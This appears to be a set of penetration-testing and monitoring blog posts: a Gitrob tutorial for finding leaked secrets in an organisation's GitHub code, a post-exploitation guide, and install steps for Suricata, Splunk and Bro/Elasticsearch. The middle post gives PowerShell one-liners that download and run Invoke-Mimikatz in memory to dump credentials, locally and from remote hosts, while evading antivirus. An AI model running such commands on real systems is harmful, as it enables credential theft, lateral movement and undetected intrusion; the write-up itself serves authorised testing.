Using Gitrob in your Penetration Testing.

Github is a remarkable place to collect data on a target, be it for a legitimate security engagement or a test of your own exposure. Gitrob is a Ruby-based tool that quickly builds a local, searchable index of all code released to Github by a particular organization. Once installation is complete, usage is trivial.


gitrob -o <org>  (e.g., gitrob -o aol)

Installation (assumes you are building on Kali):

  1. Navigate to /opt/ and issue the following:
    git clone
  2. Issue the following: sudo -u postgres -i
  3. Create your postgres account and database with the following:
    createuser -s gitrob --pwprompt
    createdb -O gitrob gitrob
  4. For Gitrob to work properly, you will need to create an API key in your Github account. This is quite simple: after ensuring you are logged into Github, navigate to and generate a new key.
    Copy the value, as you will need it later.
  5. Issue the command "gem install gitrob" in the /opt/gitrob-0.0.5/ directory.
  6. Issue gitrob --configure (pasting your API key and the password created during the postgres step).
  7. Finally, issue gitrob -o orgname and let it work. When it completes, a web service is spawned that can be used to search for leaked sensitive information.

Pro Tip:  You can easily print the browser tabs to PDFs and capture the gitrob console output into a text file.  This is particularly useful as evidence in your reports.
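The capture step above can be sketched as follows. The `run_scan` function is a hypothetical stand-in for the real `gitrob -o <org>` invocation, so the snippet can be tried anywhere; substitute the actual command on an engagement.

```shell
# Hypothetical stand-in for `gitrob -o aol`; replace with the real command.
run_scan() { printf 'findings for %s\n' "$1"; }

# Mirror stdout and stderr into a text file for report evidence,
# while still seeing the output live in the console.
run_scan aol 2>&1 | tee gitrob-aol.txt
```

`tee` both displays and records the run, so you keep an evidence artifact without changing your workflow.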

Hat tip to Michael for the incredible tool.

Post-Exploitation – Collecting credentials and staying off the disk.

In the many penetration tests that I've conducted, one of the primary goals is to collect data to use for lateral movement through the network in a way that does not trigger any alarms or alerts in Antivirus/Endpoint solutions.  This technique runs entirely in memory without installing anything to the disk, which also helps bypass additional controls such as Tripwire.

This is where I've found PowerSploit, and more particularly "Invoke-Mimikatz", to be very useful.  As PowerShell is generally permitted in most environments regardless of Application Whitelisting, this module is incredibly powerful.

Giving credit where it is due, clymb3r originally created and posted the script that will be used in this short demo.

It is important to note that this is a post-exploitation module.  You will need to have compromised a host that also permitted the elevation of privileges.  However, domain escalation is not necessary.

From within PowerShell inside the compromised host, issue the following command:

powershell "IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz -DumpCreds"

You should see similar output in the console.  You can collect and use all of the credentials displayed for connecting to additional hosts in the environment.

[Screenshot: Invoke-Mimikatz credential output on Windows 7]


If you escalated to domain-level credentials, you can also issue the following command to collect credentials remotely from other hosts.  This is particularly useful for maintaining presence or viewing additional data on the network.

powershell "IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"

This technique will not work in Windows 8/10, as new security provisions have been made.  However, I’ve seen very small deployment counts for those platforms, whereas XP and Windows 7 are still very much alive and well.

[Screenshot: Invoke-Mimikatz failing on Windows 10]


Suricata / MongoDB / Splunk Installation

The installation steps below were performed on a minimal Ubuntu 14 LTS install.

Before installing Suricata, FluentD and MongoDB, perform the following:

sudo apt-get -y install libpcre3 libpcre3-dbg libpcre3-dev \
build-essential autoconf automake libtool libpcap-dev libnet1-dev \
libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 \
make libmagic-dev

Download, configure and install Suricata:

tar -xvzf suricata-2.0.5.tar.gz
cd suricata-2.0.5

./configure --prefix=/usr --sysconfdir=/etc --localstatedir=/var
sudo make install
sudo ldconfig

./configure && make && make install-full

By default, json logs are output to /var/log/suricata/eve.json
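Each line of eve.json is a standalone JSON object, which makes quick shell triage easy before the data ever reaches MongoDB or Splunk. A minimal sketch, using two fabricated sample records (the field subset shown is illustrative, not Suricata's full EVE schema):

```shell
# Two illustrative EVE JSON records, one per line (real logs carry many more fields).
cat > eve-sample.json <<'EOF'
{"timestamp":"2015-03-06T09:00:00.000000","event_type":"alert","src_ip":"10.0.0.5","dest_ip":"10.0.0.9"}
{"timestamp":"2015-03-06T09:00:01.000000","event_type":"dns","src_ip":"10.0.0.6","dest_ip":"10.0.0.1"}
EOF

# Quick sanity check: pull only the alert events out of the log.
grep '"event_type":"alert"' eve-sample.json
```

The same one-object-per-line layout is what makes the mongoimport step later in this post work without any preprocessing.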

Download and install MongoDB

sudo apt-key adv --keyserver hkp:// --recv 7F0CEB10
echo 'deb dist 10gen' | sudo tee /etc/apt/sources.list.d/mongodb.list
sudo apt-get update
sudo apt-get install -y mongodb-org
sudo service mongod start

Initial import can be completed by doing the following:

mongoimport --db filejsondb --collection filejson --file /var/log/suricata/eve.json


The Splunk Universal Forwarder can be used for real-time ingest into Splunk.

Install the most recent forwarder and perform the following steps:

./splunk add forward-server ipaddress:9997

./splunk add monitor /var/log/suricata/eve.json
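For reference, those two commands write stanzas equivalent to the following into the forwarder's outputs.conf and inputs.conf. This is a sketch of the resulting configuration, assuming defaults; check the files under the forwarder's etc/system/local/ directory for the exact result on your install.

```ini
# outputs.conf -- written by `splunk add forward-server ipaddress:9997`
[tcpout:default-autolb-group]
server = ipaddress:9997

# inputs.conf -- written by `splunk add monitor`
[monitor:///var/log/suricata/eve.json]
disabled = false
```

Editing these files directly (and restarting the forwarder) achieves the same effect as the CLI commands.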

BRO-IDS / Brownian / ElasticSearch Installation

While focusing on network security monitoring, Bro provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Bro has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyberinfrastructure. Bro’s user community includes major universities, research labs, supercomputing centers, and open-science communities.

I’ve found the Internet lacking a straightforward method for installing BRO-IDS with Brownian and Elasticsearch. My hope is that this will ease the struggle of getting up and running.

Download and install Ubuntu 14.04 LTS.

Do not apply updates.

Install Java 7
apt-get install openjdk-7-jre-headless

Install Git
apt-get install git

Install ElasticSearch

Using the package manager, run the following:

wget -qO - | sudo apt-key add -

sudo add-apt-repository "deb stable main"

sudo apt-get update && sudo apt-get install elasticsearch

sudo update-rc.d elasticsearch defaults 95 10

service elasticsearch start

Load Prerequisites for BRO/ELS-JSON

apt-get install libcurl4-gnutls-dev

Manually compile and configure BRO


Install dependencies –

sudo apt-get install cmake make gcc g++ flex bison libpcap-dev libssl-dev python-dev swig zlib1g-dev

tar -xvf bro-2.3.1.tar.gz
cd bro-2.3.1


Run ./configure and make certain that cURL and Elasticsearch are displayed as supported in the configure summary.

make && make install

Add the following to the bottom of local.bro

@load tuning/logs-to-elasticsearch  
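If Elasticsearch is not running on the same host, the writer's destination can also be redefined in local.bro. The variable names below come from Bro 2.3's LogElasticSearch module; treat them as an assumption and verify them against your build's scripts before relying on this.

```
# Point the ElasticSearch log writer at a specific node.
# Variable names are assumptions from Bro 2.3's LogElasticSearch module.
redef LogElasticSearch::server_host = "127.0.0.1";
redef LogElasticSearch::server_port = 9200;
```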

Installation of Brownian

git clone

python ./ /opt/Brownian
cd Brownian
source ./bin/activate

pip install git+

Change ELASTICSEARCH_SERVER in Brownian/lib/python2.X/site-packages/Brownian/ to your server’s hostname and port.

Change TIME_ZONE in to your desired timezone.
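Taken together, the two edits look like this in the Brownian settings module. The values shown are examples for illustration, not defaults:

```python
# Brownian settings (Django settings.py) -- example values only.
ELASTICSEARCH_SERVER = "localhost:9200"  # host:port of your Elasticsearch node
TIME_ZONE = "America/New_York"           # any valid tz database identifier
```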

Set the local variables

export DJANGO_SETTINGS_MODULE=Brownian.settings

Configure the Server instance

python ./bin/ syncdb

nohup python ./bin/ runserver <public address>:8000 &

You should now see data in the browser window.

Apply all updates

apt-get update && apt-get upgrade

All rights and respect to the Bro Project Copyrights.